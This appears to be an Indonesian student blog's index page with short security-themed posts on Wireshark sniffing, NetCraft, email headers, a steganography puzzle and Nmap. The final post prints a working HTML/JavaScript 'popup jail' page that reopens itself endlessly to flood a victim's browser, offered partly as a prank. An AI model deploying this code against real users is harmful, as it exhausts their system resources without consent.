Mengintip Paket Data dengan WireShark

Ini ada sebuah aplikasi keren, namanya WireShark. Aplikasi ini termasuk jenis network analyzer. WireShark dapat membaca paket2 data secara ‘live’, menampilkan informasi protokol paket data secara detail, mengimpor dan mengekspor paket data dalam bentuk file, mencari dan memfilter paket data berdasarkan kriteria tertentu, bahkan… bisa dipake untuk ‘sniffing’ alias ‘menyadap’ paket data yg ditujukan untuk orang lain. Wew! bisa dipake buat yang enggak2 tuh, hehehe…

Tapi jangan dibawa ke sana dunk niatnya, pada dasarnya WireShark ini dibuat untuk tujuan yg mulia kok, misalnya untuk network troubleshooting, mempelajari protokol-protokol network, digunakan untuk debugging pada saat mengimplementasikan protokol network dan lain2.

WireShark bisa di donlot di sini, tersedia untuk platform Windows, Linux, dan MacOS. Kalo lebih seneng yg pake console alias command prompt silahkeun pake aplikasi tcpdump, tapi kalo sekedar buat belajar, tambah ilmu ato iseng sih mending pake WireShark aja, takutnya udah muntah duluan klo liat command promt, wkwkwk…

Berikut ini adalah screenshot wireshark waktu saya mencoba membuka salah satu email saya di gmail:

Lanjut membaca →

NetCraft

Ini ada sebuah webtool yang bagus, namanya NetCraft, alamatnya di sini

netcraft searchbar

Webtool yang satu ini cukup berguna, terutama buat mengecek apakah suatu website itu baik keamanannya atau tidak. Penggunaannya juga cukup mudah, cukup masukkan alamat website yang bersangkutan di search bar trus tekan enter, maka akan tampil informasi tentang website yang bersangkutan (termasuk nomor IP dan aplikasi/service yang pernah dijalankan).

Contohnya untuk website kpu hasil yang ditampilkan adalah sebagai berikut:

Lanjut membaca →

Ada Apa di Balik Header Email

Mungkin kita udah gak asing lagi dengan imel, dan setiap kita menerima imel, biasanya judul imel (subject), identitas pengirim dan tanggal pengirimannya tertera di bagian header imel seperti yang tampak di bawah ini:

header yang biasa kita lihat

tapi sebenarnya informasi yang ada di header bukan cuma itu, ini dia contoh header yang lengkap:

Lanjut membaca →

Everlasting Love Songs Secret Revealed

kebon bibit

Sesuai dengan janji saya di posting sebelumnya, ini adalah jawabannya:

Lanjut membaca →

Everlasting Love Songs, Super Gombal Edition

Ini dia beberapa koleksi lagu-lagu jadul favoritku, semuanya gombaaal abis. Tapi cover album di bawah ini bukan cover album biasa, soalnya di dalamnya ada pesan tersembunyi yang disisipkan dengan teknik steganography (bukan digital steganography lho, ini masih yg bersifat physical).

Coba perhatikan baik2 cover album ini, kira2 apa ya isi pesan tersembunyinya?

front cover

back cover

Ketemu gak isi pesannya? kalo belum ketemu juga, tunggu jawabannya di posting tanggal 6 April 2009 nanti

Btw, sebenarnya posting kali ini masih dalam rangka tugas kuliah Keamanan Informasi Lanjut (II5166) Program Magister Informatika ITB dari Pak Budi Rahardjo (http://budi.insan.co.id).

 

PS. Kunci jawaban sudah diposting di sini (update 060409)

Eksperimen dengan NMap; Security Scanner yang Muncul dalam Film-Film Box Office

nmap logo

Yup, NMap memang tool security scanner yang beken. Di kalangan praktisi computer security, NMap dikenal sebagai ‘swiss army knife‘ alias basic tool yang serbaguna. Tidak hanya beken di kalangan praktisi, tool ini juga muncul di beberapa film box office, misalnya di film The Matrix Reloaded, di sana ada salah satu adegan di mana Trinity sedang nge-hack dengan menggunakan NMap. Selain di The Matrix Reloaded, NMap juga tampil secara singkat di beberapa adegan dalam film Die Hard 4, Bourne Ultimatum, The Listening dan Battle Royale. Namun demikian, kemunculan NMap dalam The Matrix Reloaded dinilai paling realistis dibanding dalam film-film yang lain. Konon dalam adengan itu Trinity mengexploit CRC32 untuk mendapatkan akses setelah NMap mendeteksi adanya service SSH (untuk lebih jelasnya silahkan klik referensi di akhir posting ini). Lanjut membaca →

Halaman PopUp Jail

Coba lihat screen capture komputer saya ini:

 

 

banjir popup window

 

Gak kebayang kan kalo semua window itu menuhin layar dan bikin kita kehabisan resource plus kehilangan kesabaran?
Untungnya ada fasilitas dari browser untuk memblokir popup window dan javascript. Jadi kalo ada halaman web yang iseng seperti di atas, kita sedikit terlindungi, kecuali yang tidak mengaktifkan fiture tersebut (Di Mozilla masuk ke menu Tools –> Options –> Content –> Uncheck ‘Block PopUp Windows’, sedangkan di IE ada di menu Tools –> PopUp Blocker –> Turn Off PopUp Blocker)

Berikut ini adalah source file html sederhana yang bisa bikin kita (atau orang lain yang bikin kita kesel) kehabisan resource sekaligus kehilangan kesabaran:

<HTML>
<HEAD>
<SCRIPT LANGUAGE=”JavaScript”>

<!– Begin
function popUp(URL) {
day = new Date();
id = day.getTime();
eval(“page” + id + ” = window.open(URL, ‘” + id + “‘,

‘toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=10

0,height=75′);”);
}
</script>
</HEAD>

<BODY onLoad=”javascript:popUp(‘tes.html’)”>
Halaman iseng, muncul lagi!
</BODY>

</HTML>

script html di atas tinggal disave dengan nama “tes.html”. Bagian script yang di-bold adalah bagian yang membuat file jail itu meload dirinya sendiri dalam sebuah popup window setiap kali file diload ke browser. Dan voila! efeknya jadi rekursif kan? Alhasil ada yang kebanjiran popup window, kehabisan resource dan kehilangan kesabaran, hehehe…

Lagi-lagi, saya berpesan, info ini jangan disalah gunakan ya